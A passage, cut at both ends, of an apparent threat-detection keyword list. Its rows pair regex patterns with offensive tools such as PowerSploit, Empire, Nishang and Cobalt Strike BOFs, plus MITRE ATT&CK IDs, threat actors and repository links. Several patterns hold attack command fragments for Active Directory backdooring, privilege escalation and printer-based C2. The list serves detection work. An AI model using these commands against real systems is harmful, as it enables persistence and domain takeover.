All*",".{0,1000}Add\-ObjectAcl\s\-TargetADSprefix\s\'CN\=AdminSDHolder.{0,1000}CN\=System\'\s\-PrincipalSamAccountName\s.{0,1000}\s\-Rights\sAll.{0,1000}","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","10","1","18","3","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z","33347" "*Add-Persistence *",".{0,1000}Add\-Persistence\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","33348" "*Add-Persistence*",".{0,1000}Add\-Persistence.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","33349" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33350" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33351" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33352" "*Add-PodeEndpoint -Address localhost -Port *",".{0,1000}Add\-PodeEndpoint\s\-Address\slocalhost\s\-Port\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","33353" "*addPreloadToPrivesc*",".{0,1000}addPreloadToPrivesc.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - 
T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","33354" "*Add-Printer -Name ""http://$server/$printername"" -PortName ""http://$server/printers/$printername/.printer""*",".{0,1000}Add\-Printer\s\-Name\s\""http\:\/\/\$server\/\$printername\""\s\-PortName\s\""http\:\/\/\$server\/printers\/\$printername\/\.printer\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","33355" "*Add-Printer -Name $PrinterName -DriverName ""Generic / Text Only"" * -PortName*",".{0,1000}Add\-Printer\s\-Name\s\$PrinterName\s\-DriverName\s\""Generic\s\/\sText\sOnly\""\s.{0,1000}\s\-PortName.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","33356" "*Add-PrinterPort $C2output*",".{0,1000}Add\-PrinterPort\s\$C2output.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","33357" "*addpriv 
SeloadDrivePrivilege*",".{0,1000}addpriv\sSeloadDrivePrivilege.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33358" "*Add-PSFirewallRules*",".{0,1000}Add\-PSFirewallRules.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","33359" "*Add-PSFirewallRules*",".{0,1000}Add\-PSFirewallRules.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","33360" "*ADDR ?= 
127.0.0.1:4444*",".{0,1000}ADDR\s\?\=\s127\.0\.0\.1\:4444.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","33365" "*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","33366" "*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33367" "*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Persistence","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33368" "*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","33369" "*Add-RemoteRegBackdoor.json*",".{0,1000}Add\-RemoteRegBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","33370" "*addresshunter.h*",".{0,1000}addresshunter\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - 
T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33371" "*Add-ScrnSaveBackdoor.ps1*",".{0,1000}Add\-ScrnSaveBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33372" "*Add-ServiceDacl *",".{0,1000}Add\-ServiceDacl\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","33373" "*Add-ServiceDacl*",".{0,1000}Add\-ServiceDacl.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","33374" "*addspn.py -u * -p * -t * -s * --additional *",".{0,1000}addspn\.py\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-t\s.{0,1000}\s\-s\s.{0,1000}\s\-\-additional\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33375" 
"*addspn.py*",".{0,1000}addspn\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","33376" "*AddUser-Bof.c*",".{0,1000}AddUser\-Bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33377" "*AddUser-Bof.git*",".{0,1000}AddUser\-Bof\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33378" "*AddUser-Bof.o*",".{0,1000}AddUser\-Bof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33379" "*AddUser-Bof.x64*",".{0,1000}AddUser\-Bof\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33380" "*AddUser-Bof.x86*",".{0,1000}AddUser\-Bof\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","33381" "*AddUserImplant*",".{0,1000}AddUserImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","33382" "*AddUserToDomainGroup *Domain Admins*",".{0,1000}AddUserToDomainGroup\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 